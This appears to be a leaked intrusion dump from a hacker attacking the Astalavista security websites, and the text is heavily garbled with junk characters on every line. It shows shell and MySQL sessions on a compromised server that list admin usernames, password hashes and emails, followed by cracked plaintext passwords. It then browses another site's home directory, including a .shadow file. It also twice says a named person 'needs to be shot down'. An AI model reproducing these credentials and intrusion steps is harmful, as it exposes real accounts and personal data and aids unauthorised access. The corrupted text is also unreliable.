. ~; C3 g1 K, E6 |( G/ ? <link>http://www.astalavista.com/exploits</link>6 ?3 o, `: C$ t+ Q; X! Y
<description>All availably Exploits.</description>
% M- `! {: q6 R1 ] <language>en-us</language>
. H/ p! V: k) r% N* P4 a2 `& T; H <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>% s& Z6 X4 Y# L: C3 L4 j9 |- s n
<docs>http://blogs.law.harvard.edu/tech/rss</docs>- W% H0 Y4 u; Q8 b+ [4 ^" q
<generator>Astalavista.com</generator>6 r! ^0 a/ W, q2 L! o8 P
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘5 n8 I8 X3 ]1 p7 k
</channel>3 {) n8 H( R) \3 d
</rss>’;2 ~- H* S: l0 `* y" l8 ]& |
: l" o* I- A# R: h2 \ n
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
$ J' V E) y& s( R. A& @; m unlink (FULLPATH . ‘/feed/exploits.xml’);5 G" S% P/ w$ }
}
3 f4 _4 L0 ^. P+ |" E* Z
9 h3 Y7 V* ?; K8 m6 y7 ^, |$ f' A file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);3 y! ]! g) J6 Y1 `) Z3 t2 v
[snip]+ c/ k& V) @8 m/ s
% p, U! P! }# C) Y) _1 ksh-3.2$ cat exploits.sh
5 u+ w" \+ R3 n6 @4 ~) Q#!/bin/sh
( k& d. j" ]9 X
9 z5 ^( F% E4 _) S G, [/ N###########################################################
+ F" i6 \+ J8 F2 J$ D- ^# #+ F% h2 P2 r8 ?$ t' L
# Title: milw0rm exploits adder #
: L) m! V( Z5 h F1 R! a9 D, h# Description: Add all milw0rm exploits to the #0 V6 D9 j: Q- T2 g4 ~
# Astalavista.com database #
) c1 C, q# ^9 a: h9 _* N1 Y* v# #
# z( R# ^/ H& }2 K: G# Company: Astalavista Group #
' S: g/ N8 G- }( ^# l' D" I# Author: Paulo M. Santos #
) J6 G& j5 g; {: V9 r; z3 Q- v# E-Mail: 链接标记paulo.santos@astalavista.ch #: M2 T8 J2 p5 ~: s, l
# #% r9 L# e V% J! X J' `9 d
###########################################################
M. d# V! {1 @8 u8 |( J
# B. E) e, X) V/ H4 w; Z# path, i. J( V& o( X3 P+ r
this_path=/home/com/public_html/modifications/cronjobs
2 Y9 R/ o: L$ Q" U
- U2 S& C' M6 N$ i7 f# change directory
0 k: J7 |0 }& e6 k2 xcd $this_path1 T: r# G7 G7 f6 @( N- o2 s# Q' w
cd tmp/
( \: O' v$ P" u7 m- f. ^( w$ A! R! s; y, {2 X
# delete files
8 O0 }# g+ a8 H. ?rm -rf milw0rm.tar.* &) L% ~; d5 K' G& e6 R0 n7 g
rm -rf milw0rm/ &2 ?7 m* P# f* j3 v
% j3 T9 }4 T; ^0 M) D5 F# wget milw0rm paket
6 p% q6 u9 M3 I" ^! f7 Nwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]6 |' I% }( g$ D6 Y E
3 ?+ W8 K X7 T+ X
# extract milw0rm paket' C `( X( T: Q! }
tar -xvf milw0rm.tar.bz2
6 m* [, C0 |8 F1 {* B
5 r1 N3 h" ^6 B6 v9 D# change owner, p/ F8 p) d( W* R/ V4 [5 ]2 B( K
chown -R com .
6 _' S4 h/ H C# R4 gchgrp -R com .9 `( G$ E: S& G
6 s: n: b8 y6 \% a9 {1 N( N' R. S! N
# execute php script4 i# C. w, l& b' u8 S' h7 x
cd $this_path+ I1 y* r& a/ x: t U
php -q exploits.php e. n, }; u1 R% Z) {$ r
5 A" z1 o. H& b, _# i& m2 D2 e
# delete files
9 F g1 \: @- }4 ^" Irm -rf tmp/milw0rm.tar.*
3 o% n; t. z) p0 K4 d& o* a5 Arm -rf tmp/milw0rm/
4 O0 B+ J D' w. ]0 u& d3 |- P
; g0 u4 O4 y9 j1 v8 a, esh-3.2$ echo “Paulo M. Santos needs to be shot down.”" X6 R0 f% A, J7 z; V5 ]: e
Paulo M. Santos needs to be shot down.
8 B1 `: a/ I: [4 w' h8 f
% h( ~- b2 g; K" a5 v; xmysql -u contrexxuser2 -p% p: H/ U+ p& D" ]& ~2 I) n
Enter password:
5 V& \% ]# L) j. g$ ^/ RWelcome to the MySQL monitor. Commands end with ; or \g.% @. k! N7 U ^" \% N8 Z! S& j* b
Your MySQL connection id is 2616945 {% y: P0 A* B1 ~
Server version: 5.0.45-community-log MySQL Community Edition (GPL)5 s8 G8 D/ q' R& X9 Y1 _6 Y
( d( q3 Y0 T1 S) ~Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.. g3 l" B+ s8 G$ X8 p) J/ I, o
/ l3 c; _9 H9 R! S% ~* ~7 x9 w7 emysql> show databases;7 k7 Y9 x3 w+ Q" u
+——————–+
% m' O1 Y1 e% X2 T" }- I| Database |
: m* C% Q) o5 i# t* ~3 L+——————–+5 I7 x8 r& a0 m) M
| information_schema |3 s% l/ y9 Y8 K8 c$ q
| com_contrexx2 |
: i( |. B2 V$ j| com_contrexx2_live |, ^, b' N( {* B Z# M
| test |
4 ?0 u+ z( L8 h3 E+——————–+2 I! S3 ?! ~4 ]' m
4 rows in set (0.00 sec)/ J' \9 p1 p( w5 ^% a
& H: F W5 Q2 d/ S8 X' C1 m, [9 F) @
mysql> use com_contrexx2_live
/ _7 y( S) J5 e9 CDatabase changed" w0 D/ v4 T4 x2 S+ ^
mysql> show tables;* e9 J) s! h# Z
+————————————————–+1 b- D& ?+ ^4 f+ L4 k& G& ?
| Tables_in_com_contrexx2_live |
! @: Y! X7 t3 G/ P2 {- X( Q+————————————————–+
0 ^9 I+ } G* l. H- c6 c8 }| cc_banner_counter |
0 y \0 ~& d$ k9 u8 y| cc_search_counter |8 _/ L8 N1 i# e' n
| contrexx_access_group_dynamic_ids |
1 x3 S$ |* O+ |0 B6 Q| contrexx_access_group_static_ids |
" B) P" a ]0 f2 m7 }| contrexx_access_rel_user_group |
/ l% r0 y1 E1 V" t3 Z| contrexx_access_settings |$ r7 p1 H& m% Y, [* d
| contrexx_access_user_attribute |
/ c2 N. s B9 M6 W| contrexx_access_user_attribute_name |# G% r3 {/ E( S8 Z1 \
| contrexx_access_user_attribute_value |
6 |* c& p" _6 r6 d+ ]% I M7 F| contrexx_access_user_core_attribute |
3 t/ I# I; P; c* D| contrexx_access_user_groups |) b& X3 i# q& {% g3 A, H5 d2 r
| contrexx_access_user_mail |4 }7 |3 }5 k& [. J
| contrexx_access_user_profile |' m `# P2 ~, G
| contrexx_access_user_title |0 v+ n) Z+ d) D4 x
| contrexx_access_user_validity |& k6 u: i2 n# I6 k5 N; l
| contrexx_access_users |1 {" p: c- L j. g+ S
| contrexx_backend_areas |
& E. @$ h( L- ?2 ]( k* p| contrexx_backups |4 A# T# r0 ]0 ~0 T+ P. w
| contrexx_content |
/ m, ?6 ?% c* A% Y- K| contrexx_content_history |
2 K1 [) p; C" c& T% ?| contrexx_content_logfile |
* q5 l2 L8 C T. l4 q5 R* K| contrexx_content_navigation |
, n0 r; o) T' S) m| contrexx_content_navigation_history |3 Y, O6 F. o$ n, x
| contrexx_ids |
! S) C2 ^$ ^3 a g" x i* z6 O r| contrexx_languages |6 \) B0 A3 A' f& W9 S' R/ s
| contrexx_lib_country |+ t z S: a5 O% j9 n* u! u6 m
| contrexx_log |
. k9 l6 D1 l! q" V3 ? m| contrexx_module_alias_source |8 a6 x4 g0 Y a. X* U2 R
| contrexx_module_alias_target |3 x* V/ B# N1 b
| contrexx_module_block_blocks |
9 }4 \' F' L: J5 j! W. L| contrexx_module_block_rel_lang |
# q0 b/ u* m: A9 W# x* R3 p9 f: G| contrexx_module_block_rel_pages |" X* U/ F6 u/ y/ T6 v. ^4 [8 s0 l
| contrexx_module_block_settings |
7 u- u( w3 [7 ^! x2 N| contrexx_module_blog_categories |
- d, ^8 f5 H! m7 o| contrexx_module_blog_comments |. N/ Q& W4 l. w1 m# Q5 C
| contrexx_module_blog_message_to_category |
7 H7 ?& f l' n1 D| contrexx_module_blog_messages |
x6 h Y- E' n# |, H) k# x/ n| contrexx_module_blog_messages_lang |, d4 t" s: Y l1 f& {
| contrexx_module_blog_networks |
4 E' \" W9 {7 o \" o* c| contrexx_module_blog_networks_lang |6 T1 l3 G; N3 k: L9 R! G
| contrexx_module_blog_settings |9 F: }3 D& E. E
| contrexx_module_blog_votes |
; x) F4 ~! j0 F7 N2 A' ?| contrexx_module_calendar |0 j3 x% @# G5 e2 o
| contrexx_module_calendar_access |
6 G9 `% U: e4 ~- F8 n J| contrexx_module_calendar_categories |) L3 d. G( u" h( [( {4 B
| contrexx_module_calendar_form_data |$ W2 \( q( _! E' e2 s( ?$ e& v, I
| contrexx_module_calendar_form_fields |
2 Y1 \* g8 m' U| contrexx_module_calendar_registrations |
+ Z9 o( T0 O* y; g4 i| contrexx_module_calendar_settings |
+ {6 b2 f9 i* F; T5 R: i| contrexx_module_calendar_style | S$ W+ G2 Z. V* m
| contrexx_module_contact_form |
, D; B9 S9 ^- X) ?/ E( I| contrexx_module_contact_form_data |. k: `: S, c2 R7 ~3 U
| contrexx_module_contact_form_field |
% h0 B8 `- C6 B6 o# {0 ^ k| contrexx_module_contact_settings |
|5 W% E8 ~" g% N- I, A) z| contrexx_module_data_categories |
( e; h! g/ Y9 d| contrexx_module_data_message_to_category |9 G1 \/ I0 G% C e
| contrexx_module_data_messages |
; ?5 X6 A3 E8 y; J% S, N+ P| contrexx_module_data_messages_lang |
3 C& z! m/ |7 Q7 f| contrexx_module_data_placeholders |
; x: t. B7 u8 `% n/ z- t| contrexx_module_data_settings |! `# u2 Z( Z3 R
| contrexx_module_directory_access |
: S3 A7 ^/ K% Y: _ ]% D. w| contrexx_module_directory_categories | M$ p% b7 u% o4 _# w
| contrexx_module_directory_dir |
5 s4 Y# D0 ~& R. z) K| contrexx_module_directory_inputfields |$ W# K( @% e& e
| contrexx_module_directory_levels |' t) [" e5 L. F4 t, |
| contrexx_module_directory_mail |
* J. C/ O. g; c K& C1 O, Y/ A| contrexx_module_directory_rel_dir_cat |
0 j H! r' p% i2 ]| contrexx_module_directory_rel_dir_level |
! N) w* m* U5 i1 r1 A$ q- p/ I6 d2 B| contrexx_module_directory_settings |
/ _* M: i% E7 o" l- J5 a| contrexx_module_directory_settings_google |3 g& c: J7 I2 k# I$ _* b% ~
| contrexx_module_directory_vote |
3 _1 u7 y: g% @, W! A1 d| contrexx_module_docsys |4 H: X$ O% t) J+ s! ~$ R3 l
| contrexx_module_docsys_categories |
* N. j% v; v. n9 n5 P7 t| contrexx_module_egov_configuration |+ d! {! U/ U6 W/ ^( C1 O' Y. ~
| contrexx_module_egov_orders |1 ^3 J) Q; q; {
| contrexx_module_egov_product_calendar |
8 a+ R7 @( Z; R2 P3 D5 `| contrexx_module_egov_product_fields |
. k: n; L4 K: q T4 y| contrexx_module_egov_products |
- d- i9 n7 b$ @& C| contrexx_module_egov_settings |& h$ H& P$ G/ d7 } W
| contrexx_module_exploits |
& a/ G% C2 y6 `| contrexx_module_exploits_categories |7 H: f% p9 H6 F1 G1 P
| contrexx_module_feed_category |3 q$ _, t) t3 g3 L
| contrexx_module_feed_news |0 X. d2 B+ R! M0 A e! ~* P8 p
| contrexx_module_feed_newsml_association |
* ?8 B Y$ ~4 |7 H6 D| contrexx_module_feed_newsml_categories |
& }! N1 m) _/ ?6 a- D8 e$ y| contrexx_module_feed_newsml_documents |$ Z- c* o+ @4 v/ z% ?$ t# n5 a+ e
| contrexx_module_feed_newsml_providers |$ y' i. n D1 J9 M/ ^
| contrexx_module_forum_access |1 g" h8 _: O% z; a( E; o) ^' ?4 k
| contrexx_module_forum_categories |
1 Z( V9 r* i1 ]& Q5 `- G- Y0 w* d; O- [| contrexx_module_forum_categories_lang |
0 V, V, ?- k" Y+ c/ D| contrexx_module_forum_notification |
2 E' L+ }* _3 S6 h( P( Z| contrexx_module_forum_postings |
3 A2 F a! {; g. _9 }| contrexx_module_forum_rating |. b# v3 C6 u( [ p) r& r
| contrexx_module_forum_settings |9 k% k; Q' K% ?; n3 S0 B
| contrexx_module_forum_statistics |1 Q, C2 f4 ^& E0 l* P0 P4 x
| contrexx_module_gallery_categories |
3 v7 }& k, t' W+ b| contrexx_module_gallery_comments |
. p7 }! X* ^# P) B0 A! v| contrexx_module_gallery_language |7 F% K8 ?8 m* l8 V' s' B
| contrexx_module_gallery_language_pics |" P) U% K I3 p
| contrexx_module_gallery_pictures |
9 @- ?+ M: |* c! [. m J, ?| contrexx_module_gallery_settings |! a4 f& q( r+ t) s
| contrexx_module_gallery_votes |0 m. o: C) [# j
| contrexx_module_guestbook |/ s4 ~0 l& Z! P
| contrexx_module_guestbook_settings |8 r% q9 r* ]6 |2 y
| contrexx_module_livecam |
6 N, O3 Q. r" E" s8 W| contrexx_module_livecam_settings |3 Z. B6 k& S& r0 o- w! X
| contrexx_module_market |) c- G) K' H1 P ^+ B/ Y) ^
| contrexx_module_market_access |
) D% E1 v+ ^2 j5 p2 K, b& l9 \2 C9 @| contrexx_module_market_categories |4 N4 y8 ~- A; ^" d, I8 i8 ]& `
| contrexx_module_market_mail |
- i2 u6 q9 T" j| contrexx_module_market_paypal |
% r/ W4 r& I) ~. H| contrexx_module_market_settings |0 ]" N2 w4 X y" b3 F7 p
| contrexx_module_market_spez_fields |0 P8 s% ^, z" b' ]' j
| contrexx_module_mediadir_access |
0 ?% e6 L$ C: p| contrexx_module_mediadir_categories |
# `+ V; x& G, i& } s+ m$ X| contrexx_module_mediadir_comments |
9 E7 y0 z1 W' W$ m* ^+ }1 N| contrexx_module_mediadir_dir |
, z' J# e0 }' }' y$ Y _| contrexx_module_mediadir_inputfields |
3 E- t9 |* v7 v8 L3 h, N% i0 h' \| contrexx_module_mediadir_levels |1 ~% [4 R! s$ u! x, C B* ~* f
| contrexx_module_mediadir_mail |4 g% Y4 t" X, Q/ q1 V! t. i
| contrexx_module_mediadir_rel_dir_cat |5 T* _7 \5 c8 S+ C W
| contrexx_module_mediadir_rel_dir_level |
) c- y \' L4 }9 u5 A| contrexx_module_mediadir_reports |
" @( C; A/ L' o6 F: A( E, Z0 C| contrexx_module_mediadir_settings |; `: ~. k2 h4 W* x, m" Q0 \
| contrexx_module_mediadir_settings_google |
& t3 q# Y( u( D3 {; ?$ n| contrexx_module_mediadir_vote |0 T9 s6 T: l! B7 H- a
| contrexx_module_memberdir_directories |
* V, ]/ w5 u# X+ {, a| contrexx_module_memberdir_name |
- k; ?* H# ]1 ^! ` P8 Z& \" U| contrexx_module_memberdir_settings |+ |' W; C' T! P: s8 G, x7 \! W
| contrexx_module_memberdir_values |3 J: m1 N5 x( H* r+ Z
| contrexx_module_nettools_allowed_groups |8 o! \0 `* }! t1 r0 I5 o8 ^0 A8 y
| contrexx_module_nettools_settings |
4 n3 t5 Z: [! j2 f7 v% z, U" F G% h4 a| contrexx_module_news |$ c. L& O" z' N/ I! O5 Q
| contrexx_module_news_access |
6 s9 j2 w6 O! @( V! C) D| contrexx_module_news_categories |
G; @8 B. M2 M5 \" J7 ^/ G| contrexx_module_news_settings |
2 u- T9 z# v0 v, B5 b5 C/ x! f| contrexx_module_news_teaser_frame |3 X/ [ p D9 ?3 f" M
| contrexx_module_news_teaser_frame_templates |
! ~- c k3 o" e* d5 M| contrexx_module_news_ticker |9 w. L1 V0 V$ I5 E% ^9 l/ S Q" }- B
| contrexx_module_newsletter |
$ R# x7 P8 G: Q| contrexx_module_newsletter_attachment |
8 Y( M; }9 x, d2 ]# x" w| contrexx_module_newsletter_category |
- K4 G O" c# W7 b A8 R| contrexx_module_newsletter_confirm_mail |4 l8 B. J; {% P
| contrexx_module_newsletter_rel_cat_news |6 n" P% F, C/ a q
| contrexx_module_newsletter_rel_user_cat |$ V" ~; d6 h1 I2 _# V
| contrexx_module_newsletter_settings |
5 c3 `8 Z: o$ w3 u8 C! Y| contrexx_module_newsletter_template |9 k/ R# d. B9 [- T. j; t4 m# k- e! h
| contrexx_module_newsletter_tmp_sending |! O& x0 G# H" D' q+ \4 ?. {; q: b
| contrexx_module_newsletter_user |
4 e3 y0 D. V7 B: x/ ?8 f| contrexx_module_newsletter_user_title |
, s- ^4 E9 Q6 \3 ~- Y4 i q| contrexx_module_onlinetools_defaultports |$ H; L6 \' o7 _/ p1 C! s+ G
| contrexx_module_onlinetools_defaultports_back |3 ]; D; ?7 F: i3 \( |
| contrexx_module_onlinetools_geolitecity_blocks |
: l j- ]% l, u8 A, D: v: S3 G- W| contrexx_module_onlinetools_geolitecity_country |
' K! D4 f5 k1 b$ U8 S. L! }) u9 D4 G| contrexx_module_onlinetools_geolitecity_location |
) s; Q1 ?6 A+ ?5 g/ G2 z2 O| contrexx_module_podcast_category |
& O) l7 J; P( N3 `3 v| contrexx_module_podcast_medium |& F' g1 [) _, N1 \) X! M' s2 c+ v
| contrexx_module_podcast_rel_category_lang |- ]2 D$ K* f2 }6 R
| contrexx_module_podcast_rel_medium_category |& t2 {+ i$ X! U* a" g3 X
| contrexx_module_podcast_settings |# o4 g8 l1 i/ y; s
| contrexx_module_podcast_template |
4 q/ k9 h/ ~$ || contrexx_module_proxydb |
. x- y% |* b$ R( y E" C9 C| contrexx_module_recommend |
' ]% r# \9 V1 d+ H" i| contrexx_module_repository |6 [& f& L% e$ `' J) ]2 m* r8 y
| contrexx_module_securitynews_cats |
& q- k" | R" E- q& G9 x| contrexx_module_securitynews_feeds |; { d- k% z. k: R6 W& i
| contrexx_module_securitynews_news |3 C! s( C# \/ s* \# E
| contrexx_module_shop_categories |
9 Z7 N) s& U+ D1 R. V' e: R| contrexx_module_shop_config |9 {" V/ p/ I5 r# O: |0 L( s9 H; ^9 i
| contrexx_module_shop_countries |
; I1 \0 A9 m0 ?% S9 B9 `| contrexx_module_shop_currencies |
. z d$ d" y1 [2 X; \8 z| contrexx_module_shop_customers |
' ]( k' W. o0 O6 a6 e8 b| contrexx_module_shop_importimg |/ c3 Z1 d0 A6 e# e3 E
| contrexx_module_shop_lsv |
, g3 U! G) d t( N% X& s| contrexx_module_shop_mail |7 D/ i0 c0 n1 T, i. Z8 A! C& |
| contrexx_module_shop_mail_content |
* {7 m6 }4 M, k" r! n+ d! `| contrexx_module_shop_manufacturer |7 O" X5 g) V4 N
| contrexx_module_shop_order_items |; d% [6 K/ ?1 _4 ^- F
| contrexx_module_shop_order_items_attributes |
9 v! d: W. `7 V5 |: h; T) l. e| contrexx_module_shop_orders |
! ?% C% S# `: }/ k5 o| contrexx_module_shop_payment |, I- E+ Q8 f' J( [7 e( ^8 M
| contrexx_module_shop_payment_processors |
& N! Y3 A1 E6 `; x4 `4 c; T2 A% B| contrexx_module_shop_pricelists |
! E6 D+ \8 e4 a: O# z| contrexx_module_shop_products |
/ G8 h, k" {0 l0 c' {4 J+ I' p: I| contrexx_module_shop_products_attributes |
# u* d# c! h7 X, || contrexx_module_shop_products_attributes_name |1 d$ C( Z6 e9 H. ]0 e" G ]
| contrexx_module_shop_products_attributes_value |2 E4 F% p* S9 G* A0 a {( T
| contrexx_module_shop_products_downloads | W; |& ^ E7 { ^
| contrexx_module_shop_rel_countries |" u8 c1 _) ^6 F2 c% M
| contrexx_module_shop_rel_payment |
* P! \0 d7 s2 D/ ^ `| contrexx_module_shop_rel_shipment |6 k! a. M# Y$ o- F& p- N
| contrexx_module_shop_shipment_cost |" A! |8 \8 h0 M1 v8 {
| contrexx_module_shop_shipper |
; R% e9 I' I& L, D2 ?| contrexx_module_shop_vat |
1 b) w* ~7 p0 J| contrexx_module_shop_zones |
8 O7 E d& g2 H$ e( x7 J* d) o| contrexx_module_u2u_address_list |/ f3 m/ \ X% U- A
| contrexx_module_u2u_message_log |" ]2 }+ @) K( o
| contrexx_module_u2u_sent_messages |, E) {: e: n/ m: [; N, F! T! b ?
| contrexx_module_u2u_settings |
. W2 O- X# T+ C8 d, Y& Y" F| contrexx_module_u2u_user_log |9 E- W! a, z& Q9 G6 @1 B
| contrexx_modules | a- I \9 h6 Y- V/ C/ f5 ]
| contrexx_sessions |
" X, d% _ Z8 y: N* y9 z| contrexx_settings |# s# k9 W' G- }1 q& [, @5 ]9 K' v$ |
| contrexx_settings_smtp |4 C$ v8 y5 }( Q C3 L0 w
| contrexx_skins |
2 P3 c% A1 S' L" B- ]' L| contrexx_stats_browser | F9 a: b$ v3 j" D/ @7 p
| contrexx_stats_colourdepth |
! L6 Z- }. y% ]% i) x+ Q* _| contrexx_stats_config |
2 l- U/ \5 c' H4 S' {1 `| contrexx_stats_country |. B c0 {! H! W: ^( ?* M
| contrexx_stats_hostname |
, R; p# H0 v7 [4 x7 {1 Q| contrexx_stats_javascript |
: u- b2 n9 y3 |' A( p) y| contrexx_stats_operatingsystem |
; _/ Y6 Q0 o) F; m/ B/ d| contrexx_stats_referer |
. E/ n; j# E" ^6 |# H5 q% Q| contrexx_stats_requests |
; q3 |" N. N, P| contrexx_stats_requests_summary |4 s+ E3 S8 j7 t
| contrexx_stats_screenresolution |0 ]' @, K, @, i( j0 L' c
| contrexx_stats_search |- z. J0 a, ?* y/ L9 X
| contrexx_stats_spiders |
0 N) g9 L/ ^5 M) Z' P3 @* l( S| contrexx_stats_spiders_summary |. H; `: {6 S( j
| contrexx_stats_visitors |) F' B: r! }4 T, c3 f
| contrexx_stats_visitors_summary |/ _) V6 ?* R/ l5 c
| contrexx_voting_additionaldata |# _. _( n. d) {
| contrexx_voting_email |
6 ]- e2 ?% l$ x, p| contrexx_voting_rel_email_system |
0 Q* o% c5 B! a- m$ h" e9 @( a: U7 L5 B- U| contrexx_voting_results |% C$ `9 w6 ^; M2 ~( U& n0 E& ?) |
| contrexx_voting_system |
# Z$ Q+ v# K6 |5 q| foo |: C- k: Z* k" e5 B7 y! F7 W0 Z
+————————————————–+/ M2 F. N, H5 J5 `; i. h/ v
227 rows in set (0.01 sec)
% V# o+ K' _) L
8 w! J8 I6 O ?2 S' [1 n. o! _) bmysql> select count(*) as skids from contrexx_access_users;, G4 R# x& {/ m. W+ T9 j" ?- d9 s
+——-+
# u% P, {' }7 O6 N# f$ F' c| skids |
; j" w0 y0 [4 H7 P+——-+
* s `) ~! `' e. ^6 Q7 d$ ^| 53699 |& v b. S$ e( S y2 J
+——-+
3 J2 _1 g D# h o1 row in set (0.00 sec)
( c; {" S: q. G' E
$ G' m, \( I0 _+ p+ mmysql> describe contrexx_access_users;. J$ _# m% e) y+ R W3 M
+——————+——————————————+——+—–+————–+—————-+
8 l) v' |8 v6 h: W; d; p, v| Field | Type | Null | Key | Default | Extra |
9 a0 ~4 Z; h+ D2 O' j+——————+——————————————+——+—–+————–+—————-+- o9 d' C7 \4 [) B
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |- Z* j6 v8 ?" X( p
| is_admin | tinyint(1) unsigned | NO | | 0 | |
5 j1 V: Q. S0 i$ y& \2 @! L| username | varchar(40) | YES | MUL | NULL | |
8 K; H3 b2 O- G" i0 Y| password | varchar(32) | YES | | NULL | |3 l$ N* E2 f$ E
| regdate | int(14) unsigned | NO | | 0 | |
5 h) _+ c6 R" l3 _. v| expiration | int(14) unsigned | NO | | 0 | |
/ w. a9 D% n! b8 e; b( h% y| validity | int(10) unsigned | NO | | 0 | |
3 ? w) }6 T9 G: `3 A| last_auth | int(14) unsigned | NO | | 0 | |: ]# [9 H! o+ p- W+ D& I
| last_activity | int(14) unsigned | NO | | 0 | |0 g5 y; d( C7 r3 C
| email | varchar(255) | YES | | NULL | |
0 L! w- ~; _9 Y3 B7 I| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |+ O4 l% Y4 @/ [' f
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
! [- Q) Y( h, v5 Q" E. H( d7 _| backend_lang_id | int(2) unsigned | NO | | 0 | |
% P' U; j( R3 w1 F7 X; u| active | tinyint(1) | NO | | 0 | |
M) X7 q& {1 P4 L. S" `| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |2 R$ m6 c- }6 G- n) G
| restore_key | varchar(32) | NO | | | |
2 X% T. ?+ n C# m8 Z$ M' D| restore_key_time | int(14) unsigned | NO | | 0 | |9 z! x/ ? Z& q" n/ c0 Z
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
- m7 b) E' O8 Q+ D7 Z. L+——————+——————————————+——+—–+————–+—————-+4 {/ C, d- ?( C; S9 s( N- @+ r ^9 I* R
18 rows in set (0.00 sec)) o4 l% N2 x9 c" l }! v
/ e2 ?& Q- r% w' O
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
9 d% Y+ p6 z. ~8 K% p% ~. G" n# Z+————+———————————-+—————————–+1 X- f; Z+ g) \" D# x; r4 W" `: [% |
| username | password | email |
' E: V7 }8 Q8 g# J2 a+ L+————+———————————-+—————————–+9 T. n! V) L4 P/ g
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |3 q: Z: W; b0 O3 k' g5 t
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
! g4 K2 _7 w3 ^2 w$ A7 m| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |- R" K2 k. \5 p8 e& A7 Q
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
% e+ d! `* |4 ]% O; \+————+———————————-+—————————–+
. [" m2 @5 j& M6 j: J/ o4 rows in set (0.04 sec)9 h% [2 \' j' X# l7 y
3 z) k: }5 J: F0 \7 q, {6 B
mysql> exit;: d% s( m$ h1 p: c; G
Bye; j% n% l: x8 }
, s- d: u* v9 [- C8 n! a[~] There you go, your “team of security and IT professionals” is a joke.
4 ~1 \9 w9 R: }; p0 n. S3 c ?, K8 J3 {/ S# E/ L
+——————————+
; i# N1 W" O# X0 E4 K/ K7 Ssystem:f82BN3+_*! {, M# L/ X E O) d; w1 B2 O
Be1er0ph0r:belerophor4astacom1 a4 R' f% o/ f/ @% a: _
prozac:asta4cms!5 p/ I+ B& h/ c( E p! d3 b
commander:mpbdaagf6m: B: G9 E2 p9 O1 J! Z! E2 M
sykadul:ak29eral
' T& A0 w7 S" H8 w0 e6 N9 A+——————————+, D+ U3 f6 ]2 Y
6 Y8 Z1 L2 g5 r7 u, k/ }[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
$ S: _6 H' _0 N* M…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
) X% G/ X* {+ Y! e# G3 Q+ D9 E
6 h: z) f' Y( K- _- x[~] Lets move to astalavista.net now,
$ \" x. P6 Z/ \& l- x
6 C; J/ u+ j( E6 r9 g. t, jFrom <链接标记[url]https://www.astalavista.net/[/url]>:1 f d6 W8 J/ H3 ]
>> Everyone knows that the best defense is a good offense.
! k7 K* G- |7 ?% a. o, w>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.% D% M% y5 D1 p. T
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.1 ~" p& S5 g2 e
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
( z) \! T- [: U$ z" w+ _9 A/ `, \2 \, `
>> Go ahead, try and hack our server . in a completely legal way!
& h. E. ~: X5 @5 d3 H) c) J>> Learn by doing: We offer our members tricky tasks and challenges on an& q0 `, K" R" z) g, x8 M& F
>> ongoing basis so you can test your knowledge and abilities. You can also8 Z. _1 f( _. ^2 f; K& Z
>> demonstrate what you.ve mastered by taking part in regular hacker contests
2 j% |! ?$ M6 X0 U( c" E>> and war games3 K" s' L' U) @; S
0 t, v* _; o, j* s& j[~] Lets take a look there, after all… they are hack-proof, aren’t they?!& ~6 L/ t" k, d
6 Y( l' B- |- Q! f( I5 e, R" O! N[-] Tricky task: Find home dir of astalavista.net
- G. }+ o( S/ e# ^" |/ n- G/ R" @: a- t5 ?' T- Z
sh-3.2$ ls -la ~astanet$ I r4 v: k& P
total 48$ W" B. g7 C; q6 q6 N! Y% u9 i. Q- A" j
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
8 f; A& i+ V7 p4 T. ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 e6 d$ s( {& t$ N! F
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth9 X" H. q( F6 F0 a. z9 L" i/ m
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history; h) h# a$ S3 l k( o6 T
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
! A4 j" K3 K5 Z* S$ P' ?-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile$ M+ n9 @( G1 t/ R2 `* u
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc$ f" u2 N: c8 R5 k+ R+ y
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains# m; C; a+ v& t. Y1 Q6 }, L+ ~
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
* y+ M6 [1 Q& Q1 Bdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail& G* H7 j; @" \
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
4 k/ l! k: s' r2 z+ M-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow! U$ _+ U3 g' q- |
0 N# }* I8 n+ n/ M$ `* A) b
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
: v) e3 p2 U" gsh-3.2$ ls -la8 b# o4 c$ P/ Y. V7 p4 }
total 200% N7 u( ^& l! F* |- X( [
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .; X0 m; n) g- l
